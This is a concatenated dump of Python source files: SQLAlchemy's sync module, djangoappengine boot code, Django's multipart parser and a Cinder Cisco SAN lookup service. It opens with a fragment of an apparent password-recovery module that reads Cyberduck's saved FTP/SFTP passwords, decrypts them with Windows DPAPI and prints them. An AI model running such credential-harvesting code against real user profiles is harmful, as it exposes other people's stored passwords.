if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') or elem.attrib['name'].startswith('https'):
values['URL'] = elem.attrib['name']
encrypted_password = base64.b64decode(elem.attrib['value'])
password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
values['Password'] = password
pwdFound.append(values)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
# print the results
print_output("Cyberduck", pwdFound)
# main function
def run(self):
# print title
Header().title_info('Cyberduck')
path = self.get_path()
if path == 'CYBERDUCK_NOT_EXISTS':
print_debug('INFO', 'Cyberduck not installed.')
elif path == 'User_profil_not_found':
print_debug('INFO', 'User profil has not been found.')
elif path == 'APPDATA_NOT_FOUND':
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
else:
self.parse_xml(path)
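# Hedged illustration (not part of the original module): the user.config file
# parsed above is expected to contain <setting name="ftp://..." value="..."/>
# entries whose value is a base64-encoded DPAPI blob.  The sketch below only
# shows the name filtering; win32crypt decryption is omitted because it needs
# the owning Windows account.
def _demo_expected_config():
    sample = ('<configuration>'
              '<setting name="sftp://user@host" value="AAAA"/>'
              '<setting name="unrelated" value="x"/>'
              '</configuration>')
    tree = ET.ElementTree(ET.fromstring(sample))
    urls = [e.attrib['name'] for e in tree.iter('setting')
            if e.attrib['name'].startswith(('ftp', 'sftp', 'http'))]
    print(urls)  # ['sftp://user@host']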
| lgpl-3.0 | -8,486,084,563,818,609,000 | 31.826087 | 214 | 0.670053 | false |
williamfeng323/py-web | flask/lib/python3.6/site-packages/sqlalchemy/orm/sync.py | 33 | 5451 | # orm/sync.py
# Copyright (C) 2005-2017 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""private module containing functions used for copying data
between instances based on join conditions.
"""
from . import exc, util as orm_util, attributes
def populate(source, source_mapper, dest, dest_mapper,
synchronize_pairs, uowcommit, flag_cascaded_pks):
source_dict = source.dict
dest_dict = dest.dict
for l, r in synchronize_pairs:
try:
# inline of source_mapper._get_state_attr_by_column
prop = source_mapper._columntoproperty[l]
value = source.manager[prop.key].impl.get(source, source_dict,
attributes.PASSIVE_OFF)
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, dest_mapper, r)
try:
# inline of dest_mapper._set_state_attr_by_column
prop = dest_mapper._columntoproperty[r]
dest.manager[prop.key].impl.set(dest, dest_dict, value, None)
except exc.UnmappedColumnError:
_raise_col_to_prop(True, source_mapper, l, dest_mapper, r)
# technically the "r.primary_key" check isn't
# needed here, but we check for this condition to limit
# how often this logic is invoked for memory/performance
# reasons, since we only need this info for a primary key
# destination.
if flag_cascaded_pks and l.primary_key and \
r.primary_key and \
r.references(l):
uowcommit.attributes[("pk_cascaded", dest, r)] = True
def bulk_populate_inherit_keys(
source_dict, source_mapper, synchronize_pairs):
# a simplified version of populate() used by bulk insert mode
for l, r in synchronize_pairs:
try:
prop = source_mapper._columntoproperty[l]
value = source_dict[prop.key]
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, source_mapper, r)
try:
prop = source_mapper._columntoproperty[r]
source_dict[prop.key] = value
except exc.UnmappedColumnError:
_raise_col_to_prop(True, source_mapper, l, source_mapper, r)
def clear(dest, dest_mapper, synchronize_pairs):
for l, r in synchronize_pairs:
if r.primary_key and \
dest_mapper._get_state_attr_by_column(
dest, dest.dict, r) not in orm_util._none_set:
raise AssertionError(
"Dependency rule tried to blank-out primary key "
"column '%s' on instance '%s'" %
(r, orm_util.state_str(dest))
)
try:
dest_mapper._set_state_attr_by_column(dest, dest.dict, r, None)
except exc.UnmappedColumnError:
_raise_col_to_prop(True, None, l, dest_mapper, r)
def update(source, source_mapper, dest, old_prefix, synchronize_pairs):
for l, r in synchronize_pairs:
try:
oldvalue = source_mapper._get_committed_attr_by_column(
source.obj(), l)
value = source_mapper._get_state_attr_by_column(
source, source.dict, l, passive=attributes.PASSIVE_OFF)
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, None, r)
dest[r.key] = value
dest[old_prefix + r.key] = oldvalue
def populate_dict(source, source_mapper, dict_, synchronize_pairs):
for l, r in synchronize_pairs:
try:
value = source_mapper._get_state_attr_by_column(
source, source.dict, l, passive=attributes.PASSIVE_OFF)
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, None, r)
dict_[r.key] = value
def source_modified(uowcommit, source, source_mapper, synchronize_pairs):
"""return true if the source object has changes from an old to a
new value on the given synchronize pairs
"""
for l, r in synchronize_pairs:
try:
prop = source_mapper._columntoproperty[l]
except exc.UnmappedColumnError:
_raise_col_to_prop(False, source_mapper, l, None, r)
history = uowcommit.get_attribute_history(
source, prop.key, attributes.PASSIVE_NO_INITIALIZE)
if bool(history.deleted):
return True
else:
return False
def _raise_col_to_prop(isdest, source_mapper, source_column,
dest_mapper, dest_column):
if isdest:
raise exc.UnmappedColumnError(
"Can't execute sync rule for "
"destination column '%s'; mapper '%s' does not map "
"this column. Try using an explicit `foreign_keys` "
"collection which does not include this column (or use "
"a viewonly=True relation)." % (dest_column, dest_mapper))
else:
raise exc.UnmappedColumnError(
"Can't execute sync rule for "
"source column '%s'; mapper '%s' does not map this "
"column. Try using an explicit `foreign_keys` "
"collection which does not include destination column "
"'%s' (or use a viewonly=True relation)." %
(source_column, source_mapper, dest_column))
| mit | 2,865,210,851,805,501,400 | 37.935714 | 77 | 0.609429 | false |
yestech/gae-django-template | djangoappengine/boot.py | 33 | 7809 | import logging
import os
import sys
PROJECT_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
DATA_ROOT = os.path.join(PROJECT_DIR, '.gaedata')
# Overrides for os.environ
env_ext = {'DJANGO_SETTINGS_MODULE': 'settings'}
def setup_env():
"""Configures app engine environment for command-line apps."""
# Try to import the appengine code from the system path.
try:
from google.appengine.api import apiproxy_stub_map
except ImportError:
for k in [k for k in sys.modules if k.startswith('google')]:
del sys.modules[k]
# Not on the system path. Build a list of alternative paths where it
# may be. First look within the project for a local copy, then look for
# where the Mac OS SDK installs it.
paths = [os.path.join(PROJECT_DIR, '.google_appengine'),
os.environ.get('APP_ENGINE_SDK'),
'/usr/local/google_appengine',
'/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine']
for path in os.environ.get('PATH', '').split(os.pathsep):
path = path.rstrip(os.sep)
if path.endswith('google_appengine'):
paths.append(path)
if os.name in ('nt', 'dos'):
path = r'%(PROGRAMFILES)s\Google\google_appengine' % os.environ
paths.append(path)
# Loop through all possible paths and look for the SDK dir.
sdk_path = None
for path in paths:
if not path:
continue
path = os.path.expanduser(path)
path = os.path.realpath(path)
if os.path.exists(path):
sdk_path = path
break
if sdk_path is None:
# The SDK could not be found in any known location.
        sys.stderr.write('The Google App Engine SDK could not be found!\n'
                         "Make sure it's accessible via your PATH "
                         "environment variable and called google_appengine.\n")
sys.exit(1)
# Add the SDK and the libraries within it to the system path.
extra_paths = [sdk_path]
lib = os.path.join(sdk_path, 'lib')
# Automatically add all packages in the SDK's lib folder:
for dir in os.listdir(lib):
path = os.path.join(lib, dir)
# Package can be under 'lib/<pkg>/<pkg>/' or 'lib/<pkg>/lib/<pkg>/'
detect = (os.path.join(path, dir), os.path.join(path, 'lib', dir))
for path in detect:
if os.path.isdir(path) and not dir == 'django':
extra_paths.append(os.path.dirname(path))
break
sys.path = extra_paths + sys.path
from google.appengine.api import apiproxy_stub_map
setup_project()
from .utils import have_appserver
if have_appserver:
# App Engine's threading.local is broken
setup_threading()
elif not os.path.exists(DATA_ROOT):
os.mkdir(DATA_ROOT)
setup_logging()
if not have_appserver:
# Patch Django to support loading management commands from zip files
from django.core import management
management.find_commands = find_commands
def find_commands(management_dir):
"""
Given a path to a management directory, returns a list of all the command
names that are available.
This version works for django deployments which are file based or
contained in a ZIP (in sys.path).
Returns an empty list if no commands are defined.
"""
import pkgutil
return [modname for importer, modname, ispkg in pkgutil.iter_modules(
[os.path.join(management_dir, 'commands')]) if not ispkg]
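# Hedged example (not in the original module): pkgutil.iter_modules() also
# understands zipimport paths, which is what makes zipped packages work.  The
# package used below is only an illustration and assumes Django is importable.
def _demo_find_commands():
    import django.core.management
    print(find_commands(os.path.dirname(django.core.management.__file__)))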
def setup_threading():
# XXX: GAE's threading.local doesn't work correctly with subclassing
try:
from django.utils._threading_local import local
import threading
threading.local = local
except ImportError:
pass
def setup_logging():
# Fix Python 2.6 logging module
logging.logMultiprocessing = 0
# Enable logging
level = logging.DEBUG
from .utils import have_appserver
if have_appserver:
# We can't import settings at this point when running a normal
# manage.py command because this module gets imported from settings.py
from django.conf import settings
if not settings.DEBUG:
level = logging.INFO
logging.getLogger().setLevel(level)
def setup_project():
from .utils import have_appserver, on_production_server
if have_appserver:
# This fixes a pwd import bug for os.path.expanduser()
env_ext['HOME'] = PROJECT_DIR
# The dev_appserver creates a sandbox which restricts access to certain
# modules and builtins in order to emulate the production environment.
# Here we get the subprocess module back into the dev_appserver sandbox.
# This module is just too important for development.
# Also we add the compiler/parser module back and enable https connections
# (seem to be broken on Windows because the _ssl module is disallowed).
if not have_appserver:
from google.appengine.tools import dev_appserver
try:
# Backup os.environ. It gets overwritten by the dev_appserver,
# but it's needed by the subprocess module.
env = dev_appserver.DEFAULT_ENV
dev_appserver.DEFAULT_ENV = os.environ.copy()
dev_appserver.DEFAULT_ENV.update(env)
# Backup the buffer() builtin. The subprocess in Python 2.5 on
# Linux and OS X uses needs it, but the dev_appserver removes it.
dev_appserver.buffer = buffer
except AttributeError:
logging.warn('Could not patch the default environment. '
'The subprocess module will not work correctly.')
try:
# Allow importing compiler/parser and _ssl modules (for https)
dev_appserver.HardenedModulesHook._WHITE_LIST_C_MODULES.extend(
('parser', '_ssl'))
except AttributeError:
logging.warn('Could not patch modules whitelist. '
'The compiler and parser modules will not work and '
'SSL support is disabled.')
elif not on_production_server:
try:
# Restore the real subprocess module
from google.appengine.api.mail_stub import subprocess
sys.modules['subprocess'] = subprocess
# Re-inject the buffer() builtin into the subprocess module
from google.appengine.tools import dev_appserver
subprocess.buffer = dev_appserver.buffer
except Exception, e:
logging.warn('Could not add the subprocess module to the sandbox: %s' % e)
os.environ.update(env_ext)
extra_paths = [PROJECT_DIR, os.path.join(os.path.dirname(__file__), 'lib')]
zip_packages_dir = os.path.join(PROJECT_DIR, 'zip-packages')
# We support zipped packages in the common and project folders.
if os.path.isdir(zip_packages_dir):
for zip_package in os.listdir(zip_packages_dir):
extra_paths.append(os.path.join(zip_packages_dir, zip_package))
# App Engine causes main.py to be reloaded if an exception gets raised
# on the first request of a main.py instance, so don't call setup_project()
# multiple times. We ensure this indirectly by checking if we've already
# modified sys.path, already.
if len(sys.path) < len(extra_paths) or \
sys.path[:len(extra_paths)] != extra_paths:
for path in extra_paths:
while path in sys.path:
sys.path.remove(path)
sys.path = extra_paths + sys.path
| bsd-3-clause | 6,872,104,691,817,585,000 | 42.143646 | 147 | 0.628121 | false |
gminds/rapidnewsng | django/http/multipartparser.py | 19 | 23043 | """
Multi-part parsing for file uploads.
Exposes one class, ``MultiPartParser``, which feeds chunks of uploaded data to
file upload handlers for processing.
"""
from __future__ import unicode_literals
import base64
import cgi
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_text
from django.utils import six
from django.utils.text import unescape_entities
from django.core.files.uploadhandler import StopUpload, SkipFile, StopFutureHandlers
__all__ = ('MultiPartParser', 'MultiPartParserError', 'InputStreamExhausted')
class MultiPartParserError(Exception):
pass
class InputStreamExhausted(Exception):
"""
No more reads are allowed from this device.
"""
pass
RAW = "raw"
FILE = "file"
FIELD = "field"
class MultiPartParser(object):
"""
    An RFC 2388 multipart/form-data parser.
    ``MultiPartParser.parse()`` reads the input stream in ``chunk_size`` chunks
    and returns a tuple of ``(MultiValueDict(POST), MultiValueDict(FILES))``.
"""
def __init__(self, META, input_data, upload_handlers, encoding=None):
"""
Initialize the MultiPartParser object.
:META:
The standard ``META`` dictionary in Django request objects.
:input_data:
The raw post data, as a file-like object.
        :upload_handlers:
            A list of UploadHandler instances that perform operations on the
            uploaded data.
:encoding:
The encoding with which to treat the incoming data.
"""
#
        # Content-Type should contain multipart and the boundary information.
#
content_type = META.get('HTTP_CONTENT_TYPE', META.get('CONTENT_TYPE', ''))
if not content_type.startswith('multipart/'):
raise MultiPartParserError('Invalid Content-Type: %s' % content_type)
# Parse the header to get the boundary to split the parts.
ctypes, opts = parse_header(content_type.encode('ascii'))
boundary = opts.get('boundary')
if not boundary or not cgi.valid_boundary(boundary):
raise MultiPartParserError('Invalid boundary in multipart: %s' % boundary)
# Content-Length should contain the length of the body we are about
# to receive.
try:
content_length = int(META.get('HTTP_CONTENT_LENGTH', META.get('CONTENT_LENGTH', 0)))
except (ValueError, TypeError):
content_length = 0
if content_length < 0:
# This means we shouldn't continue...raise an error.
raise MultiPartParserError("Invalid content length: %r" % content_length)
if isinstance(boundary, six.text_type):
boundary = boundary.encode('ascii')
self._boundary = boundary
self._input_data = input_data
# For compatibility with low-level network APIs (with 32-bit integers),
# the chunk size should be < 2^31, but still divisible by 4.
possible_sizes = [x.chunk_size for x in upload_handlers if x.chunk_size]
self._chunk_size = min([2**31-4] + possible_sizes)
self._meta = META
self._encoding = encoding or settings.DEFAULT_CHARSET
self._content_length = content_length
self._upload_handlers = upload_handlers
def parse(self):
"""
Parse the POST data and break it into a FILES MultiValueDict and a POST
MultiValueDict.
Returns a tuple containing the POST and FILES dictionary, respectively.
"""
# We have to import QueryDict down here to avoid a circular import.
from django.http import QueryDict
encoding = self._encoding
handlers = self._upload_handlers
# HTTP spec says that Content-Length >= 0 is valid
# handling content-length == 0 before continuing
if self._content_length == 0:
return QueryDict('', encoding=self._encoding), MultiValueDict()
# See if the handler will want to take care of the parsing.
# This allows overriding everything if somebody wants it.
for handler in handlers:
result = handler.handle_raw_input(self._input_data,
self._meta,
self._content_length,
self._boundary,
encoding)
if result is not None:
return result[0], result[1]
# Create the data structures to be used later.
self._post = QueryDict('', mutable=True)
self._files = MultiValueDict()
# Instantiate the parser and stream:
stream = LazyStream(ChunkIter(self._input_data, self._chunk_size))
# Whether or not to signal a file-completion at the beginning of the loop.
old_field_name = None
counters = [0] * len(handlers)
try:
for item_type, meta_data, field_stream in Parser(stream, self._boundary):
if old_field_name:
# We run this at the beginning of the next loop
# since we cannot be sure a file is complete until
# we hit the next boundary/part of the multipart content.
self.handle_file_complete(old_field_name, counters)
old_field_name = None
try:
disposition = meta_data['content-disposition'][1]
field_name = disposition['name'].strip()
except (KeyError, IndexError, AttributeError):
continue
transfer_encoding = meta_data.get('content-transfer-encoding')
if transfer_encoding is not None:
transfer_encoding = transfer_encoding[0].strip()
field_name = force_text(field_name, encoding, errors='replace')
if item_type == FIELD:
# This is a post field, we can just set it in the post
if transfer_encoding == 'base64':
raw_data = field_stream.read()
try:
data = str(raw_data).decode('base64')
except:
data = raw_data
else:
data = field_stream.read()
self._post.appendlist(field_name,
force_text(data, encoding, errors='replace'))
elif item_type == FILE:
# This is a file, use the handler...
file_name = disposition.get('filename')
if not file_name:
continue
file_name = force_text(file_name, encoding, errors='replace')
file_name = self.IE_sanitize(unescape_entities(file_name))
content_type = meta_data.get('content-type', ('',))[0].strip()
content_type_extra = meta_data.get('content-type', (0, {}))[1]
if content_type_extra is None:
content_type_extra = {}
try:
charset = content_type_extra.get('charset', None)
except:
charset = None
try:
content_length = int(meta_data.get('content-length')[0])
except (IndexError, TypeError, ValueError):
content_length = None
counters = [0] * len(handlers)
try:
for handler in handlers:
try:
handler.new_file(field_name, file_name,
content_type, content_length,
charset, content_type_extra.copy())
except StopFutureHandlers:
break
for chunk in field_stream:
if transfer_encoding == 'base64':
# We only special-case base64 transfer encoding
# We should always read base64 streams by multiple of 4
over_bytes = len(chunk) % 4
if over_bytes:
over_chunk = field_stream.read(4 - over_bytes)
chunk += over_chunk
try:
chunk = base64.b64decode(chunk)
except Exception as e:
# Since this is only a chunk, any error is an unfixable error.
raise MultiPartParserError("Could not decode base64 data: %r" % e)
for i, handler in enumerate(handlers):
chunk_length = len(chunk)
chunk = handler.receive_data_chunk(chunk,
counters[i])
counters[i] += chunk_length
if chunk is None:
# If the chunk received by the handler is None, then don't continue.
break
except SkipFile:
# Just use up the rest of this file...
exhaust(field_stream)
else:
# Handle file upload completions on next iteration.
old_field_name = field_name
else:
# If this is neither a FIELD or a FILE, just exhaust the stream.
exhaust(stream)
except StopUpload as e:
if not e.connection_reset:
exhaust(self._input_data)
else:
# Make sure that the request data is all fed
exhaust(self._input_data)
# Signal that the upload has completed.
for handler in handlers:
retval = handler.upload_complete()
if retval:
break
return self._post, self._files
def handle_file_complete(self, old_field_name, counters):
"""
Handle all the signalling that takes place when a file is complete.
"""
for i, handler in enumerate(self._upload_handlers):
file_obj = handler.file_complete(counters[i])
if file_obj:
# If it returns a file object, then set the files dict.
self._files.appendlist(force_text(old_field_name,
self._encoding,
errors='replace'),
file_obj)
break
def IE_sanitize(self, filename):
"""Cleanup filename from Internet Explorer full paths."""
return filename and filename[filename.rfind("\\")+1:].strip()
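    def _IE_sanitize_example(self):
        # A hypothetical usage sketch (illustrative filenames only): old
        # Internet Explorer versions submit the full client-side path as the
        # filename, and IE_sanitize keeps only the basename.
        assert self.IE_sanitize("C:\\Users\\alice\\cat.jpg") == "cat.jpg"
        assert self.IE_sanitize("cat.jpg") == "cat.jpg"
        return self.IE_sanitize("C:\\Users\\alice\\cat.jpg")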
class LazyStream(six.Iterator):
"""
The LazyStream wrapper allows one to get and "unget" bytes from a stream.
Given a producer object (an iterator that yields bytestrings), the
LazyStream object will support iteration, reading, and keeping a "look-back"
variable in case you need to "unget" some bytes.
"""
def __init__(self, producer, length=None):
"""
Every LazyStream must have a producer when instantiated.
A producer is an iterable that returns a string each time it
is called.
"""
self._producer = producer
self._empty = False
self._leftover = b''
self.length = length
self.position = 0
self._remaining = length
self._unget_history = []
def tell(self):
return self.position
def read(self, size=None):
def parts():
            remaining = self._remaining if size is None else size
# do the whole thing in one shot if no limit was provided.
if remaining is None:
yield b''.join(self)
return
# otherwise do some bookkeeping to return exactly enough
# of the stream and stashing any extra content we get from
# the producer
while remaining != 0:
assert remaining > 0, 'remaining bytes to read should never go negative'
chunk = next(self)
emitting = chunk[:remaining]
self.unget(chunk[remaining:])
remaining -= len(emitting)
yield emitting
out = b''.join(parts())
return out
def __next__(self):
"""
Used when the exact number of bytes to read is unimportant.
        This procedure just returns whatever chunk is conveniently returned
from the iterator instead. Useful to avoid unnecessary bookkeeping if
performance is an issue.
"""
if self._leftover:
output = self._leftover
self._leftover = b''
else:
output = next(self._producer)
self._unget_history = []
self.position += len(output)
return output
def close(self):
"""
Used to invalidate/disable this lazy stream.
Replaces the producer with an empty list. Any leftover bytes that have
already been read will still be reported upon read() and/or next().
"""
self._producer = []
def __iter__(self):
return self
def unget(self, bytes):
"""
Places bytes back onto the front of the lazy stream.
Future calls to read() will return those bytes first. The
stream position and thus tell() will be rewound.
"""
if not bytes:
return
self._update_unget_history(len(bytes))
self.position -= len(bytes)
self._leftover = b''.join([bytes, self._leftover])
def _update_unget_history(self, num_bytes):
"""
Updates the unget history as a sanity check to see if we've pushed
back the same number of bytes in one chunk. If we keep ungetting the
        same number of bytes many times (here, 50), we're most likely in an
infinite loop of some sort. This is usually caused by a
maliciously-malformed MIME request.
"""
self._unget_history = [num_bytes] + self._unget_history[:49]
number_equal = len([current_number for current_number in self._unget_history
if current_number == num_bytes])
if number_equal > 40:
raise SuspiciousOperation(
"The multipart parser got stuck, which shouldn't happen with"
" normal uploaded files. Check for malicious upload activity;"
" if there is none, report this to the Django developers."
)
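# A minimal usage sketch (illustrative producer, not used by the parser code):
# LazyStream lets callers read an exact number of bytes and "unget" bytes so
# that a later read sees them again, which is how the boundary handling below
# pushes post-boundary bytes back onto the stream.
def _lazy_stream_example():
    stream = LazyStream(iter([b'hello ', b'world']))
    first = stream.read(5)      # b'hello'
    stream.unget(first)         # push those bytes back onto the front
    everything = stream.read()  # b'hello world' - ungotten bytes come out first
    return first, everything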
class ChunkIter(six.Iterator):
"""
An iterable that will yield chunks of data. Given a file-like object as the
constructor, this object will yield chunks of read operations from that
object.
"""
def __init__(self, flo, chunk_size=64 * 1024):
self.flo = flo
self.chunk_size = chunk_size
def __next__(self):
try:
data = self.flo.read(self.chunk_size)
except InputStreamExhausted:
raise StopIteration()
if data:
return data
else:
raise StopIteration()
def __iter__(self):
return self
class InterBoundaryIter(six.Iterator):
"""
A Producer that will iterate over boundaries.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
def __iter__(self):
return self
def __next__(self):
try:
return LazyStream(BoundaryIter(self._stream, self._boundary))
except InputStreamExhausted:
raise StopIteration()
class BoundaryIter(six.Iterator):
"""
A Producer that is sensitive to boundaries.
Will happily yield bytes until a boundary is found. Will yield the bytes
before the boundary, throw away the boundary bytes themselves, and push the
post-boundary bytes back on the stream.
The future calls to next() after locating the boundary will raise a
StopIteration exception.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
self._done = False
# rollback an additional six bytes because the format is like
# this: CRLF<boundary>[--CRLF]
self._rollback = len(boundary) + 6
# Try to use mx fast string search if available. Otherwise
# use Python find. Wrap the latter for consistency.
unused_char = self._stream.read(1)
if not unused_char:
raise InputStreamExhausted()
self._stream.unget(unused_char)
try:
from mx.TextTools import FS
self._fs = FS(boundary).find
except ImportError:
self._fs = lambda data: data.find(boundary)
def __iter__(self):
return self
def __next__(self):
if self._done:
raise StopIteration()
stream = self._stream
rollback = self._rollback
bytes_read = 0
chunks = []
for bytes in stream:
bytes_read += len(bytes)
chunks.append(bytes)
if bytes_read > rollback:
break
if not bytes:
break
else:
self._done = True
if not chunks:
raise StopIteration()
chunk = b''.join(chunks)
boundary = self._find_boundary(chunk, len(chunk) < self._rollback)
if boundary:
end, next = boundary
stream.unget(chunk[next:])
self._done = True
return chunk[:end]
else:
            # make sure we don't treat a partial boundary (and
            # its separators) as data
            if not chunk[:-rollback]:  # and len(chunk) >= (len(self._boundary) + 6):
# There's nothing left, we should just return and mark as done.
self._done = True
return chunk
else:
stream.unget(chunk[-rollback:])
return chunk[:-rollback]
    def _find_boundary(self, data, eof=False):
        """
        Finds a multipart boundary in data.
        Should no boundary exist in the data, None is returned instead.
        Otherwise a tuple containing the indices of the following is returned:
* the end of current encapsulation
* the start of the next encapsulation
"""
index = self._fs(data)
if index < 0:
return None
else:
end = index
next = index + len(self._boundary)
# backup over CRLF
last = max(0, end-1)
if data[last:last+1] == b'\n':
end -= 1
last = max(0, end-1)
if data[last:last+1] == b'\r':
end -= 1
return end, next
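# A small worked sketch (made-up buffer and boundary b'--abc'): _find_boundary
# returns (end, next) indices so that chunk[:end] is the data before the
# boundary's preceding CRLF and chunk[next:] is pushed back onto the stream.
def _boundary_iter_example():
    data = b'first part\r\n--abc\r\nsecond part'
    it = BoundaryIter(LazyStream(iter([data])), b'--abc')
    end, next_pos = it._find_boundary(data)  # end == 10, next_pos == 17
    return data[:end], data[next_pos:]       # (b'first part', b'\r\nsecond part')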
def exhaust(stream_or_iterable):
"""
Completely exhausts an iterator or stream.
Raise a MultiPartParserError if the argument is not a stream or an iterable.
"""
iterator = None
try:
iterator = iter(stream_or_iterable)
except TypeError:
iterator = ChunkIter(stream_or_iterable, 16384)
if iterator is None:
raise MultiPartParserError('multipartparser.exhaust() was passed a non-iterable or stream parameter')
for __ in iterator:
pass
def parse_boundary_stream(stream, max_header_size):
"""
Parses one and exactly one stream that encapsulates a boundary.
"""
# Stream at beginning of header, look for end of header
# and parse it if found. The header must fit within one
# chunk.
chunk = stream.read(max_header_size)
# 'find' returns the top of these four bytes, so we'll
# need to munch them later to prevent them from polluting
# the payload.
header_end = chunk.find(b'\r\n\r\n')
def _parse_header(line):
main_value_pair, params = parse_header(line)
try:
name, value = main_value_pair.split(':', 1)
        except ValueError:
raise ValueError("Invalid header: %r" % line)
return name, (value, params)
if header_end == -1:
# we find no header, so we just mark this fact and pass on
# the stream verbatim
stream.unget(chunk)
return (RAW, {}, stream)
header = chunk[:header_end]
# here we place any excess chunk back onto the stream, as
# well as throwing away the CRLFCRLF bytes from above.
stream.unget(chunk[header_end + 4:])
TYPE = RAW
outdict = {}
# Eliminate blank lines
for line in header.split(b'\r\n'):
# This terminology ("main value" and "dictionary of
# parameters") is from the Python docs.
try:
name, (value, params) = _parse_header(line)
        except ValueError:
continue
if name == 'content-disposition':
TYPE = FIELD
if params.get('filename'):
TYPE = FILE
outdict[name] = value, params
if TYPE == RAW:
stream.unget(chunk)
return (TYPE, outdict, stream)
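# A minimal sketch of what parse_boundary_stream yields for one form field
# (fabricated part bytes; FIELD, FILE and RAW are the constants used above).
def _parse_boundary_stream_example():
    part = b'Content-Disposition: form-data; name="age"\r\n\r\n42'
    item_type, headers, stream = parse_boundary_stream(
        LazyStream(iter([part])), 1024)
    # item_type -> FIELD
    # headers['content-disposition'] -> (' form-data', {'name': b'age'})
    # stream.read() -> b'42' (the payload, with the CRLFCRLF already consumed)
    return item_type, headers, stream.read()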
class Parser(object):
def __init__(self, stream, boundary):
self._stream = stream
self._separator = b'--' + boundary
def __iter__(self):
boundarystream = InterBoundaryIter(self._stream, self._separator)
for sub_stream in boundarystream:
# Iterate over each part
yield parse_boundary_stream(sub_stream, 1024)
def parse_header(line):
""" Parse the header into a key-value.
Input (line): bytes, output: unicode for key/name, bytes for value which
will be decoded later
"""
plist = _parse_header_params(b';' + line)
key = plist.pop(0).lower().decode('ascii')
pdict = {}
for p in plist:
i = p.find(b'=')
if i >= 0:
name = p[:i].strip().lower().decode('ascii')
value = p[i+1:].strip()
if len(value) >= 2 and value[:1] == value[-1:] == b'"':
value = value[1:-1]
value = value.replace(b'\\\\', b'\\').replace(b'\\"', b'"')
pdict[name] = value
return key, pdict
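# A quick sketch of parse_header on a Content-Disposition line as it appears
# inside a multipart body (example values only): the first segment becomes the
# lowercased key and the quoted parameters become a dict of bytestrings.
def _parse_header_example():
    key, params = parse_header(
        b'Content-Disposition: form-data; name="avatar"; filename="cat.jpg"')
    # key    -> 'content-disposition: form-data'
    # params -> {'name': b'avatar', 'filename': b'cat.jpg'}
    return key, params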
def _parse_header_params(s):
plist = []
while s[:1] == b';':
s = s[1:]
end = s.find(b';')
while end > 0 and s.count(b'"', 0, end) % 2:
end = s.find(b';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
plist.append(f.strip())
s = s[end:]
return plist
| bsd-3-clause | -1,504,735,567,018,942,200 | 35.061033 | 109 | 0.545025 | false |
yanheven/cinder | cinder/zonemanager/drivers/cisco/cisco_fc_san_lookup_service.py | 3 | 14776 | # (c) Copyright 2014 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import random
from eventlet import greenthread
from oslo_concurrency import processutils
from oslo_log import log as logging
from oslo_utils import excutils
import six
from cinder import exception
from cinder.i18n import _, _LE
from cinder import ssh_utils
from cinder import utils
from cinder.zonemanager.drivers.cisco import cisco_fabric_opts as fabric_opts
import cinder.zonemanager.drivers.cisco.fc_zone_constants as zone_constant
from cinder.zonemanager import fc_san_lookup_service as fc_service
from cinder.zonemanager import utils as zm_utils
LOG = logging.getLogger(__name__)
class CiscoFCSanLookupService(fc_service.FCSanLookupService):
"""The SAN lookup service that talks to Cisco switches.
Version History:
1.0.0 - Initial version
"""
VERSION = "1.0.0"
def __init__(self, **kwargs):
"""Initializing the client."""
super(CiscoFCSanLookupService, self).__init__(**kwargs)
self.configuration = kwargs.get('configuration', None)
self.create_configuration()
self.switch_user = ""
self.switch_port = ""
self.switch_pwd = ""
self.switch_ip = ""
self.sshpool = None
def create_configuration(self):
"""Configuration specific to SAN context values."""
config = self.configuration
fabric_names = [x.strip() for x in config.fc_fabric_names.split(',')]
LOG.debug('Fabric Names: %s', fabric_names)
# There can be more than one SAN in the network and we need to
# get credentials for each for SAN context lookup later.
# Cisco Zonesets require VSANs
if fabric_names:
self.fabric_configs = fabric_opts.load_fabric_configurations(
fabric_names)
def get_device_mapping_from_network(self,
initiator_wwn_list,
target_wwn_list):
"""Provides the initiator/target map for available SAN contexts.
Looks up fcns database of each fc SAN configured to find logged in
devices and returns a map of initiator and target port WWNs for each
fabric.
:param initiator_wwn_list: List of initiator port WWN
:param target_wwn_list: List of target port WWN
        :returns: List -- device wwn map in the following format
{
<San name>: {
'initiator_port_wwn_list':
('200000051e55a100', '200000051e55a121'..)
'target_port_wwn_list':
('100000051e55a100', '100000051e55a121'..)
}
}
        :raises: Exception when connection to the fabric fails
"""
device_map = {}
formatted_target_list = []
formatted_initiator_list = []
fabric_map = {}
fabric_names = self.configuration.fc_fabric_names
if not fabric_names:
raise exception.InvalidParameterValue(
err=_("Missing Fibre Channel SAN configuration "
"param - fc_fabric_names"))
fabrics = [x.strip() for x in fabric_names.split(',')]
LOG.debug("FC Fabric List: %s", fabrics)
if fabrics:
for t in target_wwn_list:
formatted_target_list.append(zm_utils.get_formatted_wwn(t))
for i in initiator_wwn_list:
formatted_initiator_list.append(zm_utils.get_formatted_wwn(i))
for fabric_name in fabrics:
self.switch_ip = self.fabric_configs[fabric_name].safe_get(
